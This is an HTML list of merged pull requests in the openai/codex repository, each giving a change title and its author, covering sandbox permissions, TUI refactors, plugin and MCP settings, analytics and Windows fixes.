<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345743639" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20072" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20072/hovercard" href="https://github.com/openai/codex/pull/20072">#20072</a> Support disabling tool suggest for specific tools. <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mzeng-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mzeng-openai">@mzeng-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341541772" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19949" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19949/hovercard" href="https://github.com/openai/codex/pull/19949">#19949</a> Support detect and import MCP, Subagents, hooks, commands from external <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexsong-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexsong-oai">@alexsong-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325600521" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19442" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19442/hovercard" href="https://github.com/openai/codex/pull/19442">#19442</a> feat: disable capabilities by model provider <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/celia-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/celia-oai">@celia-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347215261" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20108" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20108/hovercard" href="https://github.com/openai/codex/pull/20108">#20108</a> fix: restore live event submit path for apply patch tests <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341029370" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19939" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19939/hovercard" href="https://github.com/openai/codex/pull/19939">#19939</a> Restore TUI working status after steer message is set <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canvrno-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canvrno-oai">@canvrno-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346437693" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20086" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20086/hovercard" href="https://github.com/openai/codex/pull/20086">#20086</a> Fix plugin list workspace settings test isolation <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canvrno-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canvrno-oai">@canvrno-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345272517" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20049" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20049/hovercard" href="https://github.com/openai/codex/pull/20049">#20049</a> feat: expose provider capability bounds to app server clients <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/celia-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/celia-oai">@celia-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347228184" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20109" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20109/hovercard" href="https://github.com/openai/codex/pull/20109">#20109</a> feat: update Bedrock Mantle endpoint and GPT-5.4 model ID <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/celia-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/celia-oai">@celia-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347170491" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20106" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20106/hovercard" href="https://github.com/openai/codex/pull/20106">#20106</a> linux-sandbox: switch helper plumbing to PermissionProfile <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347286811" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20112" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20112/hovercard" href="https://github.com/openai/codex/pull/20112">#20112</a> Soften skill description budget warnings <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xl-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xl-openai">@xl-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345451346" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20058" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20058/hovercard" href="https://github.com/openai/codex/pull/20058">#20058</a> Add environment provider snapshot <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/starr-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/starr-openai">@starr-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347639414" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20133" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20133/hovercard" href="https://github.com/openai/codex/pull/20133">#20133</a> chore(cli) deprecate --full-auto <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dylan-hurd-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dylan-hurd-oai">@dylan-hurd-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347354208" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20117" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20117/hovercard" href="https://github.com/openai/codex/pull/20117">#20117</a> feat(cli): add explicit sandbox permission profiles <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/viyatb-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/viyatb-oai">@viyatb-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348023817" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20139" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20139/hovercard" href="https://github.com/openai/codex/pull/20139">#20139</a> Delete multi_agent_v2 followup_task interrupt parameter <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andmis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andmis">@andmis</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347354604" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20118" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20118/hovercard" href="https://github.com/openai/codex/pull/20118">#20118</a> feat(cli): add sandbox profile config controls <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/viyatb-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/viyatb-oai">@viyatb-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348149418" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20144" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20144/hovercard" href="https://github.com/openai/codex/pull/20144">#20144</a> Fix migrated hook path rewriting <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexsong-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexsong-oai">@alexsong-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345101156" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20042" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20042/hovercard" href="https://github.com/openai/codex/pull/20042">#20042</a> Fix Windows pseudoconsole attribute handling for sandboxed PTY sessions <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iceweasel-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iceweasel-oai">@iceweasel-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349596014" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20186" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20186/hovercard" href="https://github.com/openai/codex/pull/20186">#20186</a> nit: drop old memories things <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349167164" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20180" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20180/hovercard" href="https://github.com/openai/codex/pull/20180">#20180</a> Make multi-agent v2 ignore agents.max_depth <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jif-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jif-oai">@jif-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346060024" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20082" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20082/hovercard" href="https://github.com/openai/codex/pull/20082">#20082</a> Use /goal resume for paused goals <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349080078" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20172" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20172/hovercard" href="https://github.com/openai/codex/pull/20172">#20172</a> TUI: Remove core protocol dependency [1/7] <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319029128" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19211" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19211/hovercard" href="https://github.com/openai/codex/pull/19211">#19211</a> Improve Windows process management edge cases <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iceweasel-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iceweasel-oai">@iceweasel-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347445122" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20123" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20123/hovercard" href="https://github.com/openai/codex/pull/20123">#20123</a> [rollout-tracer] Match analysis messages on encrypted id. <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cassirer-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cassirer-openai">@cassirer-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349081460" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20173" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20173/hovercard" href="https://github.com/openai/codex/pull/20173">#20173</a> TUI: Remove core protocol dependency [2/7] <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349082340" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20174" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20174/hovercard" href="https://github.com/openai/codex/pull/20174">#20174</a> TUI: Remove core protocol dependency [3/7] <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352294714" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20228" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20228/hovercard" href="https://github.com/openai/codex/pull/20228">#20228</a> [codex-backend] Prefer sqlite git info for rollout-path reads <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeytrasatti-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeytrasatti-openai">@joeytrasatti-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348072542" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20141" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20141/hovercard" href="https://github.com/openai/codex/pull/20141">#20141</a> Add ThreadManager sample crate <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345204473" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20046" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20046/hovercard" href="https://github.com/openai/codex/pull/20046">#20046</a> test protocol: lock inter-agent commentary phase <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/friel-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/friel-openai">@friel-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345526562" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20064" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20064/hovercard" href="https://github.com/openai/codex/pull/20064">#20064</a> Include auto-review rollout in feedback uploads <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/won-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/won-openai">@won-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346812890" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20096" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20096/hovercard" href="https://github.com/openai/codex/pull/20096">#20096</a> feat: Use remote installed plugin cache for skills and MCP <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xl-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xl-openai">@xl-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318244058" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19184" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19184/hovercard" href="https://github.com/openai/codex/pull/19184">#19184</a> fix: handle deferred network proxy denials <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/viyatb-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/viyatb-oai">@viyatb-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346571594" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20089" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20089/hovercard" href="https://github.com/openai/codex/pull/20089">#20089</a> expand the set of core shell env vars for Windows. <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iceweasel-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iceweasel-oai">@iceweasel-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4222416042" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/17088" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/17088/hovercard" href="https://github.com/openai/codex/pull/17088">#17088</a> [codex-analytics] ingest server requests and responses <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rhan-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rhan-oai">@rhan-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346630685" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20091" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20091/hovercard" href="https://github.com/openai/codex/pull/20091">#20091</a> [tool_suggest] Improve tool_suggest triggering conditions. <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mzeng-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mzeng-openai">@mzeng-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353434295" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20258" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20258/hovercard" href="https://github.com/openai/codex/pull/20258">#20258</a> app-server: fix outgoing sender test setup <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sayan-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sayan-oai">@sayan-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345278770" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20050" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20050/hovercard" href="https://github.com/openai/codex/pull/20050">#20050</a> [app-server] type client response payloads <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rhan-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rhan-oai">@rhan-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342567537" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19966" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19966/hovercard" href="https://github.com/openai/codex/pull/19966">#19966</a> Require remote plugin detail before uninstall <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xli-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xli-oai">@xli-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345461655" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20059" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20059/hovercard" href="https://github.com/openai/codex/pull/20059">#20059</a> [app-server] centralize client response analytics <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rhan-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rhan-oai">@rhan-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4321960752" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19334" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19334/hovercard" href="https://github.com/openai/codex/pull/19334">#19334</a> Fallback login callback port when default is busy <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xli-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xli-oai">@xli-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352334413" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20231" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20231/hovercard" href="https://github.com/openai/codex/pull/20231">#20231</a> [apps] Add apps MCP path override <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adaley-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adaley-openai">@adaley-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352706064" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20242" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20242/hovercard" href="https://github.com/openai/codex/pull/20242">#20242</a> docs: discourage <code>#[async_trait]</code> and <code>#[allow(async_fn_in_trait)]</code> <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329701062" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19620" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19620/hovercard" href="https://github.com/openai/codex/pull/19620">#19620</a> Escape turn metadata headers as ASCII JSON <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327579194" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19537" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19537/hovercard" href="https://github.com/openai/codex/pull/19537">#19537</a> [mcp] Fix plugin MCP approval policy. <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mzeng-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mzeng-openai">@mzeng-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319446775" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19229" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19229/hovercard" href="https://github.com/openai/codex/pull/19229">#19229</a> Add agent graph store interface <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rasmusrygaard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rasmusrygaard">@rasmusrygaard</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352716575" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20243" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20243/hovercard" href="https://github.com/openai/codex/pull/20243">#20243</a> Add codex-core public API listing <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325370978" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19435" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19435/hovercard" href="https://github.com/openai/codex/pull/19435">#19435</a> stop blocking unified_exec on Windows <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iceweasel-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iceweasel-oai">@iceweasel-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337946990" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19852" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19852/hovercard" href="https://github.com/openai/codex/pull/19852">#19852</a> Enforce workspace metadata protections in Linux sandbox <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evawong-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evawong-oai">@evawong-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347740125" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20136" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20136/hovercard" href="https://github.com/openai/codex/pull/20136">#20136</a> Update Codex login success page UX <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rafael-jac/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rafael-jac">@rafael-jac</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354086046" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20271" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20271/hovercard" href="https://github.com/openai/codex/pull/20271">#20271</a> chore: increase release build timeout from 60 min to 90 <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bolinfest/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bolinfest">@bolinfest</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333432504" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/19778" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/19778/hovercard" href="https://github.com/openai/codex/pull/19778">#19778</a> Add hooks/list app-server RPC <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abhinav-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abhinav-oai">@abhinav-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353657495" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20261" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20261/hovercard" href="https://github.com/openai/codex/pull/20261">#20261</a> Consume ai-title from external sessions and add end marker <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexsong-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexsong-oai">@alexsong-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354307252" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20284" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20284/hovercard" href="https://github.com/openai/codex/pull/20284">#20284</a> Import external agent sessions in background <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stefanstokic-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stefanstokic-oai">@stefanstokic-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348335973" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20149" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20149/hovercard" href="https://github.com/openai/codex/pull/20149">#20149</a> Reduce the surface of collaboration modes <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pakrym-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pakrym-oai">@pakrym-oai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354280174" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20282" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20282/hovercard" href="https://github.com/openai/codex/pull/20282">#20282</a> tui: return from side chat on Ctrl-D <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/etraut-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/etraut-openai">@etraut-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353114876" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20250" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20250/hovercard" href="https://github.com/openai/codex/pull/20250">#20250</a> update codex_plugins_beta_setting (from workspace settings) <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zamoshchin-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zamoshchin-openai">@zamoshchin-openai</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345939816" data-permission-text="Title is private" data-url="https://github.com/openai/codex/issues/20080" data-hovercard-type="pull_request" data-hovercard-url="/openai/codex/pull/20080/hovercard" href="https://github.com/openai/codex/pull/20080">#20080</a> [codex-analytics] prevent stale guardian events from satisfying reused reviews <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rhan-oai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rhan-oai">@rhan-oai</a></li>
